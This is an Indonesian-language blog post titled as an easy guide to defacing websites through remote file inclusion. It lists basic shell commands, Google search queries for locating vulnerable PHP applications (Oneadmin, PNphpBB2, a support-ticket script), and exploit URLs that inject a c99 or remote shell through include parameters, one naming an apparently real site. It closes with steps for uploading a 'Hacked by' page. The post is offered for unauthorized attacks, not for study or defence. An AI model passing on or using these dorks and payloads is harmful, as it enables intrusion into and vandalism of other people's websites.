Cara Mudah Deface Web Via RFI

Simpan Postingan

Cara Mudah Deface Remote File Include

Sebelum kita mulai lebih baik juga kita mengetahwi berbagai macam Command command yang bermanfaat bagi kita..

cd namadirectory = Melihat Suatu directory

ls -al = Melihat Suatu Directory Lebih Dalam lagi

find = Mengecek Directory directory

cat = Membaca Suatu Berkas

wget = MengUpload suatu Files

tar -zxvf = MengExtraxt suatu files yang berbentuk tgz

pwd = Mengetahui Di Directory mana Kita Berada

uname -a = Keberadaan Path berada

w = Mengetahui Siapa Saja yang telah menggunakan Shell.

curl = mendownload url

[EvilShellInject] = inject rshell / c99 kamu

Baiklah kita mulai dengan PHP karena PHP banyak sekali BUG nya..di antaranya :

Googling ajah, sebelumnya cari dulu RFI di http://www.milw0rm.com

– Site Oneadmin RFI

Kamu Search di Google masukkan Kata Kunci oneadmin site:.com / oneadmin site:com

nah sekarang saya kasi contoh pathnya … http://target.com/oneadmin/config.php?path[docroot]=

Contoh :

http://target.com/oneadmin/config.php?path[docroot]=[EvilShellInject]

– PnPhpBB2

Kamu Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka atau kehendaki…

nah sekarang saya kasi contoh pathnya …http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]

Contoh :

http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]

– Support Ticket

Kamu Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kalian suka atau kehendaki…

nah sekarang saya kasi contoh pathnya … http://target.com/include/main.php?config[search_disp]=true&include_dir=

Contoh : … http://target.com/include/main.php?config[search_disp]=true&include_dir=[EvilShellInject]

Hehehe Lumayan banyak kan ? Nah selamat mencobanya..

Neh aku kasi beberapa web yang telah berhasil saya Deface..

Nah setelah itu buadlah sebuad file: index.html

Isi dengan:

<html>

Hacked by Nama Kamu

</html>

Kemudian upload deh file ke directorynya

kemudian buka website yang telah di deface:

http://target.com/lokasipathnya/index.html

Enjoy

Vuln

September 01, 2015 •

Disclaimer: gambar, artikel ataupun video yang ada di web ini terkadang berasal dari berbagai sumber media lain. Hak Cipta sepenuhnya dipegang oleh sumber tersebut. Jika ada masalah terkait hal ini, Anda dapat menghubungi kami di halaman ini.